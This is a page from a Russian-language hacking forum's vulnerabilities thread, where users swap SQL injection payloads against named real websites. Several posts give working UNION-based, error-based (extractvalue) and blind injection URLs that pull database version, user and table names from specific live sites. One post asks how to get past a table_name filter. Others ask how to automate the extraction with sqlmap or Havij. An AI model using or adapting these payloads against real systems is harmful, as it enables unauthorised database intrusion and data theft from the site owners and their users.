HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23141  
Старый 03.01.2014, 19:26
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Цитата:
Сообщение от er9j6@  
Вбиваешь в Havij, и крутишь
5.1.70-log
так неинтересно!
 
Ответить с цитированием

  #23142  
Старый 03.01.2014, 20:29
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от Always  
так неинтересно!
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
 
Ответить с цитированием

  #23143  
Старый 03.01.2014, 20:42
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
но мне тот линк интересен, как его крутануть?!
 
Ответить с цитированием

  #23144  
Старый 04.01.2014, 18:39
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

такой вопросец,

http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))

не дает вывода на страницу, почуму?

ведь ascii(substring(user(),1,1)) ровняется 116

так нормальнро выводится

http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116

я как-то запрос не так составл?
 
Ответить с цитированием

  #23145  
Старый 04.01.2014, 18:55
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от er9j6@  
так не пробовал выводить?
http://www.btlt.ru/comp/index.php?a=f&id=1+union+select+1,2,table_name+fRo M+information_schema.tables+limit+41,1+--+
меня интересует именно мой вопрос
 
Ответить с цитированием

  #23146  
Старый 04.01.2014, 20:06
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от qaz  
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
Вызов функций в limit'е ? lol
 
Ответить с цитированием

  #23147  
Старый 05.01.2014, 00:25
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Привет всем, есть инъекция вида

Цитата:
Сообщение от None  
http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.
 
Ответить с цитированием

  #23148  
Старый 05.01.2014, 02:45
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.

Цитата:
Сообщение от OxoTnik  
И что значит
Цитата:
Сообщение от None  
автоматизировать подбор limit
" if author else f"
Цитата:
OxoTnik said:
И что значит
Цитата:
Сообщение от None  
автоматизировать подбор limit
Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.

Или можно что-то сделать с sqlmap?
 
Ответить с цитированием

  #23149  
Старый 05.01.2014, 16:39
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Так что, мне никто не поможет
 
Ответить с цитированием

  #23150  
Старый 05.01.2014, 17:33
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Фильтруется table_name . Что сделать можно?

Цитата:
Сообщение от None  
http://www.rubo.ru/%25D1%2580%25D0%25BE%25D1%2581%25D1%2581%25D0%25B8 %25D1%258F/multday.ru'or(ExtractValue(1,concat(0x3a,(select(t able_name)from(information_schema.tables)limit/**/0,1))))='1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...